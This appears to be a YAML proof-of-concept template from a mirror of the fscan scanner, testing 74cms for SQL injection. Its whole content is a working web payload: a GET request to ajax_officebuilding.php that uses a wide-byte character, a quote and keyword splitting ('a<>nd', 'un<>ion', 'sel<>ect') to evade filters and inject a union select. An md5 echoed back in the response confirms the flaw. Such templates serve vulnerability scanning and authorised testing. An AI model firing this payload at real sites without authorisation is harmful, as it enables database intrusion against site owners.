mirror of https://github.com/qwqdanchun/fscan.git
13 lines
373 B
YAML
13 lines
373 B
YAML
|
name: poc-yaml-74cms-sqli-2
|
||
|
set:
|
||
|
rand: randomInt(200000000, 210000000)
|
||
|
rules:
|
||
|
- method: GET
|
||
|
path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
|
||
|
expression: |
|
||
|
response.body.bcontains(bytes(md5(string(rand))))
|
||
|
detail:
|
||
|
author: rexus
|
||
|
links:
|
||
|
- https://www.uedbox.com/post/30019/
|